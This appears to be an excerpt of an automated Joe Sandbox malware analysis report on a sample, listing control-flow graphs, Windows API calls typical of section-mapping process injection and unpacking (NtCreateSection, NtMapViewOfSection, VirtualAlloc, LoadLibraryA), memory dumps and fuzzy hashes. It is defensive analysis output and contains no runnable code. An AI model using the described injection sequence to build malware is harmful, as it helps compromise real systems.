                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 1546783058-0
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                  control_flow_graph 350 401729 351 40172b 350->351 352 40172f-40174d 350->352 351->352 353 40172d 351->353 365 401764 352->365 366 401755-401778 352->366 353->352 355 4016be-4016cb NtCreateSection 353->355 357 4016d1-4016d5 355->357 358 4018dd-40193b call 4011cd 355->358 357->358 361 4016db-4016fc NtMapViewOfSection 357->361 361->358 364 401702-40171e NtMapViewOfSection 361->364 364->358 368 401724 364->368 365->366 375 40177b-4017b8 366->375 368->358 371 401724 call 401729 368->371 371->358 392 4017ba-4017e3 375->392 397 4017e5-4017eb 392->397 398 4017ed 392->398 399 4017f3-4017f9 397->399 398->399 400 401809-40180d 399->400 401 4017fb-401807 399->401 400->399 402 40180f-401814 400->402 401->400 403 401816 call 40181b 402->403 404 40187c-40188b 402->404 406 40188e-401891 404->406 407 401893-40189d 406->407 408 4018bb-4018d4 406->408 409 4018a0-4018a9 407->409 408->358 410 4018b7 409->410 411 4018ab-4018b5 409->411 410->409 412 4018b9 410->412 411->410 412->406
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 004016C6
                                                                                                                                                                                                                                                                                                                                                                  • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016F7
                                                                                                                                                                                                                                                                                                                                                                  • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401719
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2135252025.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_S23UhdW5DH.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: Section$View$Create
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 33071139-0
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                  control_flow_graph 413 5df950-5df969 414 5df96b-5df96d 413->414 415 5df96f 414->415 416 5df974-5df980 CreateToolhelp32Snapshot 414->416 415->416 417 5df990-5df99d Module32First 416->417 418 5df982-5df988 416->418 419 5df99f-5df9a0 call 5df60f 417->419 420 5df9a6-5df9ae 417->420 418->417 423 5df98a-5df98e 418->423 424 5df9a5 419->424 423->414 423->417 424->420
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 005DF978
                                                                                                                                                                                                                                                                                                                                                                  • Module32First.KERNEL32(00000000,00000224), ref: 005DF998
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2136667464.00000000005D8000.00000040.00000020.00020000.00000000.sdmp, Offset: 005D8000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_5d8000_S23UhdW5DH.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: CreateFirstModule32SnapshotToolhelp32
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 3833638111-0
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                  control_flow_graph 0 55003c-550047 1 55004c-550263 call 550a3f call 550e0f call 550d90 VirtualAlloc 0->1 2 550049 0->2 17 550265-550289 call 550a69 1->17 18 55028b-550292 1->18 2->1 23 5502ce-5503c2 VirtualProtect call 550cce call 550ce7 17->23 20 5502a1-5502b0 18->20 22 5502b2-5502cc 20->22 20->23 22->20 29 5503d1-5503e0 23->29 30 5503e2-550437 call 550ce7 29->30 31 550439-5504b8 VirtualFree 29->31 30->29 33 5505f4-5505fe 31->33 34 5504be-5504cd 31->34 35 550604-55060d 33->35 36 55077f-550789 33->36 38 5504d3-5504dd 34->38 35->36 39 550613-550637 35->39 42 5507a6-5507b0 36->42 43 55078b-5507a3 36->43 38->33 41 5504e3-550505 38->41 46 55063e-550648 39->46 50 550517-550520 41->50 51 550507-550515 41->51 44 5507b6-5507cb 42->44 45 55086e-5508be LoadLibraryA 42->45 43->42 47 5507d2-5507d5 44->47 55 5508c7-5508f9 45->55 46->36 48 55064e-55065a 46->48 52 550824-550833 47->52 53 5507d7-5507e0 47->53 48->36 54 550660-55066a 48->54 56 550526-550547 50->56 51->56 60 550839-55083c 52->60 57 5507e4-550822 53->57 58 5507e2 53->58 59 55067a-550689 54->59 61 550902-55091d 55->61 62 5508fb-550901 55->62 63 55054d-550550 56->63 57->47 58->52 64 550750-55077a 59->64 65 55068f-5506b2 59->65 60->45 66 55083e-550847 60->66 62->61 68 550556-55056b 63->68 69 5505e0-5505ef 63->69 64->46 70 5506b4-5506ed 65->70 71 5506ef-5506fc 65->71 72 550849 66->72 73 55084b-55086c 66->73 74 55056d 68->74 75 55056f-55057a 68->75 69->38 70->71 76 5506fe-550748 71->76 77 55074b 71->77 72->45 73->60 74->69 78 55057c-550599 75->78 79 55059b-5505bb 75->79 76->77 77->59 84 5505bd-5505db 78->84 79->84 84->63
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 0055024D
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2135693322.0000000000550000.00000040.00001000.00020000.00000000.sdmp, Offset: 00550000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_550000_S23UhdW5DH.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: AllocVirtual
                                                                                                                                                                                                                                                                                                                                                                  • String ID: cess$kernel32.dll
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 4275171209-1230238691
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                  control_flow_graph 426 550e0f-550e24 SetErrorMode * 2 427 550e26 426->427 428 550e2b-550e2c 426->428 427->428
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • SetErrorMode.KERNELBASE(00000400,?,?,00550223,?,?), ref: 00550E19
                                                                                                                                                                                                                                                                                                                                                                  • SetErrorMode.KERNELBASE(00000000,?,?,00550223,?,?), ref: 00550E1E
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2135693322.0000000000550000.00000040.00001000.00020000.00000000.sdmp, Offset: 00550000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_550000_S23UhdW5DH.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: ErrorMode
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 2340568224-0
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                  control_flow_graph 429 40193e-401947 430 40195e 429->430 431 40194f-40195a 429->431 430->431 432 401961-4019ae call 4011cd Sleep call 401452 430->432 431->432 443 4019b0-4019b8 call 401553 432->443 444 4019bd-401a03 call 4011cd 432->444 443->444
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • Sleep.KERNELBASE(00001388,0000006E), ref: 00401999
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00401553: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401617
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00401553: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401644
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2135252025.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_S23UhdW5DH.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: CreateDuplicateObjectSectionSleep
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 4152845823-0
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 71f746a8505fe108ed8da4cdd9973d259565c9a68103dfaed9332816d2b6fe75
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 4db8ba0b08380255fc5aa34ea3e13561f838480f888933e927f1079a64c57490
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 71f746a8505fe108ed8da4cdd9973d259565c9a68103dfaed9332816d2b6fe75
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9A11CEF120C208FBEB006A959D62E7A3268AB40714F304137BA43790F1D57E8923F76B
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                  control_flow_graph 458 40194a-4019ae call 4011cd Sleep call 401452 471 4019b0-4019b8 call 401553 458->471 472 4019bd-401a03 call 4011cd 458->472 471->472
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • Sleep.KERNELBASE(00001388,0000006E), ref: 00401999
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00401553: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401617
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00401553: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401644
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2135252025.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_S23UhdW5DH.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: CreateDuplicateObjectSectionSleep
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 4152845823-0
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: da38201a32f90b98934b488a65b371e434f1df0c2a04d29242935d2455de016b
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 0371ecd990254dd767a604aa567081474727263e4e3774a05daf7e54a603023c
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: da38201a32f90b98934b488a65b371e434f1df0c2a04d29242935d2455de016b
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A901A1B120C204EBDB009A95DD62E7A3364AB40314F30453BBA437A1F1C67D9913E72B
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                  control_flow_graph 486 40195c-4019ae call 4011cd Sleep call 401452 498 4019b0-4019b8 call 401553 486->498 499 4019bd-401a03 call 4011cd 486->499 498->499
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • Sleep.KERNELBASE(00001388,0000006E), ref: 00401999
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00401553: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401617
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00401553: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401644
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2135252025.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_S23UhdW5DH.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: CreateDuplicateObjectSectionSleep
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 4152845823-0
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 5e3dbe5dd20a4fb5b92f76c9b13fda5f390ba4e8200e1751a23b03b4d52e4fb4
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 3b2e7dc224df146109f963d95c0ead7a9e1b698bafe8296883a7ac19869aede1
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5e3dbe5dd20a4fb5b92f76c9b13fda5f390ba4e8200e1751a23b03b4d52e4fb4
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: BA0171B5208204EADB006AD5DD71E7A3269AB44314F304537BA43791F1D57D8912F72B
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                  control_flow_graph 513 401973-4019ae call 4011cd Sleep call 401452 524 4019b0-4019b8 call 401553 513->524 525 4019bd-401a03 call 4011cd 513->525 524->525
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • Sleep.KERNELBASE(00001388,0000006E), ref: 00401999
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00401553: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401617
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00401553: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401644
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2135252025.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_S23UhdW5DH.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: CreateDuplicateObjectSectionSleep
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 4152845823-0
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: acb1fae293eb73a10805bbdd55e216ebbc49928181db8483aeacc3243d44ee5b
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 4b03b50232763afd30ab0c608f125a1a80ed78bb00471cf4ed55e3bed959d7b6
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: acb1fae293eb73a10805bbdd55e216ebbc49928181db8483aeacc3243d44ee5b
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F80184B5208204EBDB006AD5DD71EBA3269AB44354F304537BA43790F1C57D8912F72B
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                  control_flow_graph 539 401964-4019ae call 4011cd Sleep call 401452 549 4019b0-4019b8 call 401553 539->549 550 4019bd-401a03 call 4011cd 539->550 549->550
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • Sleep.KERNELBASE(00001388,0000006E), ref: 00401999
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00401553: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401617
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00401553: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401644
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2135252025.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_S23UhdW5DH.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: CreateDuplicateObjectSectionSleep
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 4152845823-0
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 005DF660
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2136667464.00000000005D8000.00000040.00000020.00020000.00000000.sdmp, Offset: 005D8000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_5d8000_S23UhdW5DH.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: AllocVirtual
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 4275171209-0
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • Sleep.KERNELBASE(00001388,0000006E), ref: 00401999
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00401553: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401617
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00401553: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401644
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2135252025.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_S23UhdW5DH.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: CreateDuplicateObjectSectionSleep
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 4152845823-0
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • Sleep.KERNELBASE(00001388,0000006E), ref: 00401999
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00401553: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401617
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00401553: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401644
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2135252025.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_S23UhdW5DH.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: CreateDuplicateObjectSectionSleep
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 4152845823-0
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2135693322.0000000000550000.00000040.00001000.00020000.00000000.sdmp, Offset: 00550000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_550000_S23UhdW5DH.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                                                  • String ID: .$GetProcAddress.$l
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 0-2784972518
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: a0d7601ad3be0be9ca7345b1b9b156f71840a4e34a964fc1e8f9d03f8084ce82
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 483179B6900609CFDB10CF99C880AAEBBF9FF48325F24504AD841A7351D771EA49CBA4
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2136667464.00000000005D8000.00000040.00000020.00020000.00000000.sdmp, Offset: 005D8000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_5d8000_S23UhdW5DH.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 862b97f804dc900b862328dd0e529abca940ec3582f87d39a1fcde5c7c3de1ae
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2911707A3401009FD754DF59DC81FA677EAFB88320B298066ED09CB315E675EC02C760
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2135693322.0000000000550000.00000040.00001000.00020000.00000000.sdmp, Offset: 00550000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_550000_S23UhdW5DH.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 714e70d2f4900003e1559038d9d578e80d48b8cbfd1985c0913e936ce88b802b
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E801DF72A006008FDB21DF60C825BAA37B9FB86306F1544A6D90A97282E370A8498B80
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2135252025.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_S23UhdW5DH.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: c0f638128aba8f2e57abeaf16cd5152cf31c34a5a8aefa37a689e9950b3c5785
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: d35cd02017a8908298582cacd0956aff43537afd2df8e264233619bb44fb754d
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c0f638128aba8f2e57abeaf16cd5152cf31c34a5a8aefa37a689e9950b3c5785
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 82C08C72D960008AE65BC6908A87644BB33F003830B341F2DC5018F126D272C2178220
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2135252025.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_S23UhdW5DH.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
